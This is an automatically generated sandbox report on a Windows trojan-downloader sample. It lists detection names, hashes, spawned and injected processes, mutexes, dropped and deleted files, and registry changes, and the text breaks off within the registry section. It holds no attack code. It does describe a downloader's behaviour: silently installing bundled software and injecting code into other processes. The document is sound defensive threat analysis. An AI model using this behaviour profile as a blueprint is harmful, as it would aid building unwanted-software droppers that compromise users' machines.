Trojan-Downloader.Win32.Genome.svyz (Kaspersky), Trojan.GenericKD.2517745 (B) (Emsisoft), Trojan.GenericKD.2517745 (AdAware), Trojan.NSIS.StartPage.FD, Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan-Downloader, Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: e495f071ab1b0a4a2577a7f7500b0849
SHA1: ca80e2e61734dc4bcc358650b1ad617d22f137f3
SHA256: 1b57f16dc8494ccda7ac3d0be5311cb82e0f391e5e90e8083cad92202edf0237
SSDeep: 6144:zeTeM/Tm97ccRErXepd8ILan5eFERXQLdtTBFDGusCtlbr1tfJ637grVG0mJNp5c:HM2Z2rXepd5oRkdJuKbfc3g8PNE
Size: 439589 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: Bandoo Media Inc
Created at: 2009-06-19 00:33:23
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
popwndexe.exe:592
install1403380.exe:1196
RsMgrSvc.exe:468
ravmond.exe:1328
ravmond.exe:1848
SinaInstall_567015.exe:604
SinaInstall_567015.exe:1296
The Trojan injects its code into the following process(es):
ntvdm.exe:680
MM-liao8327.exe:1372
%original file name%.exe:1312
Mutexes
The following mutexes were created/opened:
ZonesLockedCacheCounterMutex
ZonesCounterMutex
ZonesCacheCounterMutex
WininetProxyRegistryMutex
WininetConnectionMutex
WininetStartupMutex
c:!documents and settings!adm!local settings!history!history.ie5!
c:!documents and settings!adm!cookies!
c:!documents and settings!adm!local settings!temporary internet files!content.ie5!
_!MSFTHISTORY!_
ShimCacheMutex
RasPbFile
az2015624145ytda
File activity
The process ntvdm.exe:680 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\DOCUMENTS AND SETTINGS (4 bytes)
%WinDir%\Temp\Perflib_Perfdata_7b8.dat (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\ĬÈÃÂÂ\ui\InStaller (4 bytes)
C:\ (100 bytes)
%System%\wbem\Logs (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\ĬÈÃÂÂ\ui\InStaller\jindutiao.png (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\ĬÈÃÂÂ\ui\InStaller\btn_03.png (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\ĬÈÃÂÂ\ui\InStaller\delete.png (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\index.dat (400 bytes)
%WinDir%\Temp\scs3.tmp (33880 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\ĬÈÃÂÂ\ui\InStaller\check1.png (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\ĬÈÃÂÂ\ui\InStaller\bg_03.png (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\ĬÈÃÂÂ\ui\InStaller\bg_01.png (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\ĬÈÃÂÂ\ui\InStaller\input_01.png (4 bytes)
%WinDir%\REGISTRATION (4 bytes)
%WinDir% (972 bytes)
C:\$Directory (1304 bytes)
%System% (7592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\ĬÈÃÂÂ\ui\InStaller\change.png (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\ĬÈÃÂÂ\ui\InStaller\btn_change02.png (4 bytes)
%System%\config (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\ĬÈÃÂÂ\ui\InStaller\finish.png (12 bytes)
%System%\wbem (1064 bytes)
%System%\drivers (32 bytes)
%WinDir%\Temp\scs4.tmp (10145 bytes)
%Documents and Settings%\%current user% (4 bytes)
%Documents and Settings%\%current user%\Cookies (192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\ĬÈÃÂÂ\ui\InStaller\check-box.png (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\ĬÈÃÂÂ\ui\InStaller\jieya_button.png (12 bytes)
%Documents and Settings%\%current user%\LOCAL SETTINGS (4 bytes)
The Trojan deletes the following file(s):
%WinDir%\Temp\scs4.tmp (0 bytes)
%WinDir%\Temp\scs3.tmp (0 bytes)
The process MM-liao8327.exe:1372 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\TN7V2XRD\Opendownloadernewxml[1].htm (900 bytes)
The process install1403380.exe:1196 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\Rising\RAV\XMLS\CLOUDV3.xml (1 bytes)
%Program Files%\Rising\RSD\RSD932\Jpn.lag (37 bytes)
%Program Files%\Rising\RAV\ravxp.exe (601 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\HOOKBASE.xml (4 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDQRY\CLOUDQRY.xml (1 bytes)
%Program Files%\Rising\RSD\Data\RAV\RAV.ini (57324 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\update.xml (164 bytes)
%Program Files%\Rising\RSD\comx3.dll (673 bytes)
%Program Files%\Rising\RAV\XMLS\RAV936.xml (515 bytes)
%Program Files%\Rising\RAV\cfgxml\userdata.mond (485 bytes)
%Program Files%\Rising\RAV\pngdll.dll (1425 bytes)
%Program Files%\Rising\RAV\Proccomm.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\rsdll.dll.dat (101 bytes)
%Program Files%\Rising\RAV\comx3.dll (673 bytes)
%Program Files%\Rising\RAV\hookbase.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\RsTray.ico (68 bytes)
%Program Files%\Rising\RSD\Backup\RAV\LICENSE\12345678.000 (24 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\RsTray.ico (601 bytes)
%Program Files%\Rising\RAV\XMLS\RAVBASE.xml (4 bytes)
%Program Files%\Rising\RAV\rstask.xml (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RsBackup.exe (1851 bytes)
%Program Files%\Rising\RAV\cloudstore.dll (2321 bytes)
%Program Files%\Rising\RAV\atl90.dll (673 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAV936\RAV936.xml (515 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3 (4 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\RSMONDEF.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RsAppMgr.dll (168 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\Repair.url (155 bytes)
%Program Files%\Rising\RAV\XMLS\setup.xml (2 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\updater.exe (3361 bytes)
%Program Files%\Rising\RAV\rsdll.dll (601 bytes)
%Program Files%\Rising\RAV\Microsoft.VC90.ATL.manifest (466 bytes)
%Documents and Settings%\All Users\Application Data\Rising\Rav\datastorage.db (19 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVDEFDB\rsuser.db1 (601 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\adefmon.mond (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\install1403380.exe.log (314853 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\Rav.7z (22865 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravdefdb\mondef.dll (2065 bytes)
%Program Files%\Rising\RAV\XMLS\RAVXP.xml (404 bytes)
%Program Files%\Rising\RAV\XMLS\RSCFG.xml (996 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVXP\RAVXP.xml (404 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MONBASEDUI\rssrv.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\mondrv.dll (6605 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVMAINDUI\rsmain.dll (601 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\localopt.dll (1281 bytes)
%Program Files%\Rising\RAV\rscombas.dll (1281 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\monrule.dll (601 bytes)
%Program Files%\Rising\RAV\bawhite.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\cnt08.dll (1787 bytes)
%Program Files%\Rising\RSD\setup.dat (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravdefdb\ravdefdb.xml (967 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\Proccomm.dll (608 bytes)
%Program Files%\Rising\RAV\bawhite.dat (22 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\repairmanager.mond (207 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MONBASEDUI\ravmond.exe (1425 bytes)
%Program Files%\Rising\RAV\NetConfig.ini (24 bytes)
%Program Files%\Rising\RSD\rsdk.dll (3073 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\RsBaseNetWrapper.dll (48 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\monbasedui (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdinfo.dll (1000 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\repairmanager.dll (38 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\_rav\setup.xml (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudqry\cloudsta.dll (63 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\cnt09.dll (2293 bytes)
%System%\drivers\sysmon.sys (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscfg\rscfg.dll (1202 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVLOG\rslog.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdk\traywnd.dll (76 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\pngdll.dll (741 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\monbasedui\rscombas.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RAV.cfg (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\mscrt9\msvcp90.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\mscrt9\msvcr90.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\cloudstore.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\Custom.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\monbasedui\moncomm.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudqry\cloudqry.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\label.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\mscrt9\atl90.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\mscrt9\Microsoft.VC90.ATL.manifest (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\popwndexe.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\CfgDll.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\mscrt9\Microsoft.VC90.CRT.manifest (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\64\rsutils.sys (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\TN7V2XRD\c[1].aspx (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\mscrt9 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\monbasedui\ravmond.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\os.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsPcVer12.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\64\sysmon.sys (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\kguard.sys (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RAV_DL (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\rsutils_if.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudqry\rscurl.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\TN7V2XRD\ForLogDeve[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudqry\cloudnet.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\rsutils.sys (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\sysmon.sys (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\monbasedui\monbasedui.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\TN7V2XRD\RsPcVer12[1].xml (0 bytes)
%Program Files%\RsTest.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\protreg.sys (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\userdata.mond (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\localopt.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\TN7V2XRD\CAIZYB2P.htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\license\license.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\64 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\cloudnotifier.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\license\12345678.000 (0 bytes)
%Program Files%\Rising\RAV (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\dataups.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\kguard_if.dll (0 bytes)
%Program Files%\Rising (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\CompsVer.inf (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\cloudwork.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\license (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\monbasedui (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\datastorage.db (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\mondrv.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WSS96LYK\urg[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\cloudv3.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudqry (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\rsdll.dll.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\sysmon_if.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudqry\cloudsta.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\TN7V2XRD\urg[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\monbasedui\rssrv.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\hookbase.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\64\rsndisp.sys (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\mscrt9\mscrt9.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudqry\cloudqry.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\TN7V2XRD\irg[1].ashx (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\rsndisp.sys (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\hookbase.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\license\12345678.000.bak (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\Cloudv3.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\Rav.7z (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\comx3.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudqry\rsnscfg.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\userdata.rstray (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\Auto.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\localopt.dll (0 bytes)
The process %original file name%.exe:1312 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nss2.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss2.tmp\xID.dll (3 bytes)
C:\setup_a1474.exe (39 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss2.tmp\3.dll (18791 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WSS96LYK\desktop.ini (67 bytes)
C:\SinaInstall_567015.exe (15021 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\TN7V2XRD\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\FFS5V15X\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W1IRKDYZ\desktop.ini (67 bytes)
C:\MM-liao8327.exe (6359 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nss2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss1.tmp (0 bytes)
The process RsMgrSvc.exe:468 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\Rising\RSD\RsMgrSvc.exe.log (367 bytes)
%Program Files%\Rising\RSD\RsMgrSvc.dat (708 bytes)
The process ravmond.exe:1328 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\Rising\RAV\logfiles\ravmond.exe.cloudwork.log (6073 bytes)
%Program Files%\Rising\RAV\logfiles\ravmond.exe.log (149 bytes)
%Program Files%\Rising\RAV\browserruncount.dat (944 bytes)
%Program Files%\Rising\RAV\prvcloudcfg.ini (26 bytes)
%Program Files%\Rising\RAV\ravmond.exe_status.ini (80 bytes)
%Program Files%\Rising\RAV\CCenter.db-journal (18630 bytes)
%Program Files%\Rising\RAV\CCenter.db (623 bytes)
The Trojan deletes the following file(s):
%Program Files%\Rising\RAV\CCenter.db-journal (0 bytes)
The process SinaInstall_567015.exe:604 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\SinaInstall_567015.exe (15506 bytes)
The process SinaInstall_567015.exe:1296 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\-¼ -\ui\InStaller\bg_01.png (258 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WSS96LYK\core[1].php (764 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\ĬÈÃÂÂ\ui\InStaller\bg_02.png (902 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\installedSoftInfo.ini (1804 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\ĬÈÃÂÂ\ui\InStaller\jindutiao.png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\skinconfig.ini (82 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\ĬÈÃÂÂ\ui\InStaller\btn_03.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\DI_17.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\ĬÈÃÂÂ\ui\prompt\pop_bg.png (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\ĬÈÃÂÂ\ui\InStaller\delete.png (3 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@config.0551fs[1].txt (219 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\ĬÈÃÂÂ\ui\InStaller\check1.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\-¼ -\ui\InStaller\bg_03.png (258 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\ĬÈÃÂÂ\ui\InStaller\bg_03.png (902 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\ĬÈÃÂÂ\InStaller_prompt.ini (375 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\ĬÈÃÂÂ\ui\InStaller\bg_01.png (902 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\ĬÈÃÂÂ\ui\InStaller\input_01.png (3 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@mmstat[1].txt (170 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\DW_9.tmp (633 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\ĬÈÃÂÂ\ui\InStaller\change.png (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CA_8.tmp (2705 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\ĬÈÃÂÂ\ui\prompt\cancel_btn.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\LZMA.dll (68 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W1IRKDYZ\z_stat[1].php (1097 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\DW_7.tmp (201 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\ĬÈÃÂÂ\InStaller.ini (939 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\unrar.dll (824 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\-¼ -\ui\InStaller\bg_02.png (258 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\TN7V2XRD\install_begin[1].htm (329 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\ĬÈÃÂÂ\ui\InStaller\btn_change02.png (3 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@cnzz.mmstat[1].txt (205 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\ĬÈÃÂÂ\ui\InStaller\finish.png (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WSS96LYK\img[1].png (135828 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\ĬÈÃÂÂ\ui\img.rar (82437 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_kprd7_93.xml (663 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\FFS5V15X\stat[1].gif (43 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@cnzz[1].txt (165 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\ĬÈÃÂÂ\ui\prompt\go.png (196 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (3376 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\op_5.tmp_0 (631 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\ĬÈÃÂÂ\ui\InStaller\check-box.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\ĬÈÃÂÂ\ui\InStaller\jieya_button.png (392 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\MSHist012014040820140409\index.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\installedSoftInfo.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\DW_11.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\DW_B.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\MA_16.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\DI_17.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\DW_14.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\DW_10.tmp (0 bytes)
C:\op_5.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\DW_13.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\DW_A.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\DW_9.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\DW_F.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CA_8.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\DW_C.tmp (0 bytes)
C:\_6.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\DW_7.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\DW_18.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\DW_12.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\DW_D.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\MSHist012014040820140409 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\DW_E.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\DW_15.tmp (0 bytes)
Registry activity
The process MM-liao8327.exe:1372 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
